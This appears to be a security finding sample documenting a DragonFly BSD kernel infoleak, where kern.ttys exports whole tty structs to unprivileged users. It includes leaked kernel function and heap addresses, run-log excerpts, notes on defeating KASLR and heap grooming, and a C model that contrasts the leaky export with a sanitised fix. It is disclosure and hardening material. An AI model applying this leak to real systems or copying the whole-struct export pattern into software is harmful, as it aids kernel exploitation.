DF-0006 / leak_sample.txt
# DF-0006 leak sample — kernel function/heap pointers leaked via kern.ttys
# Guest: DragonFly 6.5-DEVELOPMENT v6.5.0.1712.g89e6a-DEVELOPMENT (amd64)
# Reader: uid=1001 (maxx), NOT in wheel. Node: kern.ttys (CTLFLAG_RD, world-read)
#
# sysctl_kern_ttys (sys/kern/tty.c:2891-2921) does t = *tp; (whole struct),
# sanitizes ONLY t_dev, then SYSCTL_OUT(&t, sizeof(t)). struct tty is 376 bytes;
# 10 ttys -> 3760 bytes leaked. Scanned at 8-byte stride for canonical-upper-half
# kernel addresses (>= 0xffff800000000000).
#
# 102 kernel-range pointer-sized values leaked per run. Function pointers are
# the KASLR-defeat primitive: they match `nm /boot/kernel/kernel` symbols EXACTLY.

## function pointers (struct tty intra-offset 256/264/272 = t_oproc/t_stop/t_param) ##
leaked value              tty driver   nm symbol        type  match
0xffffffff80b8b800 (x8)   syscons      scstart+0x0      T     EXACT
0xffffffff806b7eb0 (x8)   generic      nottystop+0x0    T     EXACT
0xffffffff80b86930 (x8)   syscons      scparam+0x0      t     EXACT
0xffffffff80c2e9b0 (x1)   serial com   comstart+0x0     t     EXACT
0xffffffff80c2fe30 (x1)   serial com   comstop+0x0      t     EXACT
0xffffffff80c30120 (x1)   serial com   comparam+0x0     t     EXACT
0xffffffff810e1280 (x1)   (t_list)     tty_list+0x0     d     EXACT

## heap / direct-map pointers (c_data buffers, t_pgrp/t_session, t_token) ##
leaked value               intra-off   nm nearest
0xfffff800abac7600 (x10)   352         (global token, identical across all 10 ttys)
0xfffff80065c84c00..       48          t_rawq.c_data (clist data buffers)
0xfffff800ab6d2800..       80          t_canq.c_data
0xfffff80066828000..       112         t_outq.c_data
0xfffff80046186370..       160         t_pgrp (pgrp slab objects)
0xfffff80065bfd098..       168         t_session (session slab objects)
0xffffffff80d86d34 (x10)   24          lwkt_token internal (db_lengths+0x16c region)

## decisive excerpt from run.log
got 3760 bytes from kern.ttys
raw blob written to ttys.bin (3760 bytes)
blob offset 24 (word 3): 0xffffffff80d86d34
...
blob offset 256 (word 32): 0xffffffff80b8b800 <- t_oproc = scstart (.text)
blob offset 264 (word 33): 0xffffffff806b7eb0 <- t_stop = nottystop (.text)
blob offset 272 (word 34): 0xffffffff80b86930 <- t_param = scparam (.text)
...
total kernel-range pointer-sized values leaked: 102
RUN_EXIT=0

## interpretation
The leaked .text function-pointer values (scstart/nottystop/scparam/comstart/comstop/comparam) EXACTLY equal their static `nm /boot/kernel/kernel` addresses, so this build has no KASLR slide at the tty function pointers; an attacker reads the precise kernel .text base from an unprivileged account. The 0xfffff8xxxxxxxxxx values are live slab/direct-map addresses (clist buffers, pgrp/session objects), revealing kernel heap layout for grooming a separate heap-corruption bug.

## variance across 3 runs (same boot)
run.log / run.2.log / run.3.log : identical "102 kernel-range pointers leaked"; function-pointer addresses byte-identical across runs (stable .text); slab addresses byte-identical within the boot (stable slab layout). Across a reboot the slab addresses change but the .text addresses stay fixed (no KASLR).
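The root cause above is the export pattern, not the individual fields: copying a whole kernel object into a sysctl buffer and scrubbing one member leaves every pointer in place. The following user-space model is an added example, not DragonFly's code: `struct model_tty`, `struct model_xtty`, the two export routines and the pointer values are constructed for illustration and do not reproduce the real 376-byte `struct tty` layout. It places the whole-struct export beside the hardened form (a dedicated export struct filled field by field) and runs the same 8-byte-stride kernel-range scan the report used, so the fix can be checked by the method that found the leak.

```c
/*
 * Added example (not DragonFly's code): a user-space model of a world-readable
 * sysctl export, showing the whole-struct copy beside a field-by-field export
 * struct, plus the 8-byte-stride scan used in the report to count what a
 * blob reveals. Layout, names and pointer values are constructed.
 */
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

/* Lowest canonical-upper-half amd64 address; anything at or above it is treated
 * as a kernel pointer (same threshold as the scan in the report). */
#define KERNEL_RANGE_MIN 0xffff800000000000ULL

/* Constructed stand-in for a kernel tty object: scalar state a reader may see,
 * mixed with pointers that must never leave the kernel. No padding: all 8-byte
 * members are 8-byte aligned and the two ints fill one 8-byte slot. */
struct model_tty {
    uint64_t t_dev;        /* device number; the only field the real handler scrubs */
    int      t_state;
    int      t_flags;
    uint64_t t_rawq_data;  /* clist data buffer (kernel heap) */
    uint64_t t_pgrp;       /* pgrp slab object */
    uint64_t t_session;    /* session slab object */
    uint64_t t_oproc;      /* driver start routine (.text) */
    uint64_t t_stop;       /* driver stop routine (.text) */
    uint64_t t_param;      /* driver param routine (.text) */
    uint64_t t_token;      /* lock token */
};

/* Export struct holding only what an unprivileged reader is meant to get. */
struct model_xtty {
    uint64_t t_dev;
    int      t_state;
    int      t_flags;
};

/* Vulnerable pattern: copy the whole object, scrub one member, hand it out.
 * Every pointer member survives the copy. */
size_t export_whole(const struct model_tty *tp, unsigned char *out, size_t outlen)
{
    struct model_tty t;
    if (outlen < sizeof(t))
        return 0;
    t = *tp;
    t.t_dev = 0;                      /* only t_dev is sanitised */
    memcpy(out, &t, sizeof(t));
    return sizeof(t);
}

/* Hardened pattern: a separate export struct, zeroed first so padding cannot
 * carry stack contents, then filled one allowed member at a time. t_dev is
 * simply zeroed here; the real handler's t_dev treatment is not modelled. */
size_t export_sanitised(const struct model_tty *tp, unsigned char *out, size_t outlen)
{
    struct model_xtty xt;
    if (outlen < sizeof(xt))
        return 0;
    memset(&xt, 0, sizeof(xt));
    xt.t_dev   = 0;
    xt.t_state = tp->t_state;
    xt.t_flags = tp->t_flags;
    memcpy(out, &xt, sizeof(xt));
    return sizeof(xt);
}

/* The report's check: count 8-byte-aligned words in the blob that fall in the
 * kernel address range. A correct export must return 0. */
size_t count_kernel_pointers(const unsigned char *blob, size_t len)
{
    size_t hits = 0;
    for (size_t off = 0; off + sizeof(uint64_t) <= len; off += sizeof(uint64_t)) {
        uint64_t w;
        memcpy(&w, blob + off, sizeof(w));
        if (w >= KERNEL_RANGE_MIN)
            hits++;
    }
    return hits;
}

/* Constructed sample object; pointer values are kernel-range placeholders. */
static const struct model_tty sample_tty = {
    .t_dev = 0x1234, .t_state = 0x10, .t_flags = 0x4,
    .t_rawq_data = 0xfffff80065c84c00ULL,
    .t_pgrp      = 0xfffff80046186370ULL,
    .t_session   = 0xfffff80065bfd098ULL,
    .t_oproc     = 0xffffffff80b8b800ULL,
    .t_stop      = 0xffffffff806b7eb0ULL,
    .t_param     = 0xffffffff80b86930ULL,
    .t_token     = 0xfffff800abac7600ULL,
};

/* Kernel-range words revealed by each export of the sample object. */
size_t leaks_from_whole(void)
{
    unsigned char buf[sizeof(struct model_tty)];
    size_t n = export_whole(&sample_tty, buf, sizeof(buf));
    return count_kernel_pointers(buf, n);
}

size_t leaks_from_sanitised(void)
{
    unsigned char buf[sizeof(struct model_tty)];
    size_t n = export_sanitised(&sample_tty, buf, sizeof(buf));
    return count_kernel_pointers(buf, n);
}

int main(void)
{
    printf("whole-struct export: %zu kernel-range words\n", leaks_from_whole());
    printf("sanitised export:    %zu kernel-range words\n", leaks_from_sanitised());
    return 0;
}
```

On the sample object the whole-struct export reveals all seven pointer members (three heap objects, three .text function pointers, one token), while the field-by-field export reveals none. Running the same scan over the real blob after a fix, as the report did over ttys.bin, is the regression check: the count must drop from 102 to 0 for a reader outside wheel.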